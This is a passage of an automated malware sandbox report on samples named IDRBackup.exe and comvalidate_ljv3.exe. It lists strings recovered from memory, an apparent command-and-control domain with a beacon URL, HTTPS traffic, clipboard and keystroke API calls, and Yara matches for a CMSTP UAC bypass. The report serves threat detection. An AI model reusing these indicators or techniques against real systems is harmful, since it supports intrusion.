                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000000.2210893352.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000000.2808211879.00000001401F4000.00000002.00000001.01000000.0000001A.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                      Source: IDRBackup.exe, 00000002.00000002.1821626167.0000000061EB1000.00000008.00000001.01000000.00000009.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.surfok.de/
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2618354577.0000000000494000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.0000000000494000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.0000000000493000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online/
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online/O
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online/b
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2597643516.0000000000493000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online/c
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2619174284.00000000007F3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online/edward-gringhuis
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2508050889.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528506572.000000000050D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online/edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2488817743.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618755936.000000000042C000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2618354577.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2571029868.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618939343.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online:443/edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FR
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2431217978.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online:443x
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gakaroli.online:443y
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://goto.itopupdate.com/appgoto?name=idr
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://s3.amazonaws.com/myfilelist/list
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://s3.amazonaws.com/myfilelist/list-dpm
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://s3.amazonaws.com/myfilelist/list-itop
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://s3.amazonaws.com/myfilelist/list-pdf
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://stats.reportcpanel.com/iusage_v2.php3
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://storage.googleapis.com/myfilelist/list
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://storage.googleapis.com/myfilelist/list-dpm
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://storage.googleapis.com/myfilelist/list-itopU
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://storage.googleapis.com/myfilelist/list-pdf
                      Source: IDRBackup.exe, 00000002.00000000.1679158396.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://storage.googleapis.com/myfilelist/listU
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.cat/verCIT-10j
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.cat/verCIT-10x
                      Source: IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: IDRBackup.exe, 00000002.00000003.1793774333.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794337701.0000000004229000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793634673.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795170834.0000000004221000.00000004.00000001.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1795306287.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1793866976.0000000000840000.00000004.00000020.00020000.00000000.sdmp, IDRBackup.exe, 00000002.00000003.1794674843.0000000004221000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: comvalidate_ljv3.exe, 0000000A.00000002.2629974281.0000000007E0F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49772 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49792 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49803 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.141.133:443 -> 192.168.2.4:49815 version: TLS 1.2
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140007860 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SetClipboardData,CloseClipboard,10_2_0000000140007860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140007860 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SetClipboardData,CloseClipboard,10_2_0000000140007860
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140007274 GetDlgItem,GetDlgItem,GetWindowRect,ScreenToClient,ScreenToClient,GetClientRect,CreateDIBSection,GetDC,CreateCompatibleDC,SelectObject,SelectObject,ReleaseDC,SendMessageW,10_2_0000000140007274
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400038A8 KillTimer,GetAsyncKeyState,SetTimer,10_2_00000001400038A8
                      Source: Yara matchFile source: Process Memory Space: IDRBackup.exe PID: 7680, type: MEMORYSTR

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 12.2.cmd.exe.30f07f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.comvalidate_ljv3.exe.26d86ed.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.cmd.exe.49afa00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.comvalidate_ljv3.exe.262baed.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4c48acd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.cmd.exe.50a76cd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.cmd.exe.5061a00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.comvalidate_ljv3.exe.25e6a20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.cmd.exe.49f56cd.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 21.2.comvalidate_ljv3.exe.262c6ed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 12.2.cmd.exe.50a6acd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4c496cd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.comvalidate_ljv3.exe.26d7aed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.comvalidate_ljv3.exe.2692a20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.cmd.exe.49f4acd.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4c03a00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014011FF38 CreateFileW,malloc,ReadFile,NtClose,10_2_000000014011FF38
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\69034d.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{4D89D5F7-3F05-4FE5-88CD-06F9F4B7FE68}Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI512.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\69034f.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\69034f.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\69034f.msiJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F0042_2_5000F004
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F00C2_2_5000F00C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F0142_2_5000F014
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F01C2_2_5000F01C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F29C2_2_5000F29C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2A42_2_5000F2A4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2AC2_2_5000F2AC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2B42_2_5000F2B4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2BC2_2_5000F2BC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2C42_2_5000F2C4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2CC2_2_5000F2CC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2D42_2_5000F2D4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2DC2_2_5000F2DC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2E42_2_5000F2E4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2EC2_2_5000F2EC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2F42_2_5000F2F4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F2FC2_2_5000F2FC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3042_2_5000F304
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F30C2_2_5000F30C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3142_2_5000F314
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F31C2_2_5000F31C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3242_2_5000F324
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F32C2_2_5000F32C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3342_2_5000F334
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F33C2_2_5000F33C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3442_2_5000F344
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F34C2_2_5000F34C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3542_2_5000F354
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F35C2_2_5000F35C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3642_2_5000F364
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F36C2_2_5000F36C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3742_2_5000F374
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F37C2_2_5000F37C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3842_2_5000F384
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F38C2_2_5000F38C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3942_2_5000F394
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F39C2_2_5000F39C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3A42_2_5000F3A4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3AC2_2_5000F3AC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3B42_2_5000F3B4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3BC2_2_5000F3BC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3C42_2_5000F3C4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3CC2_2_5000F3CC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3D42_2_5000F3D4
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000F3DC2_2_5000F3DC
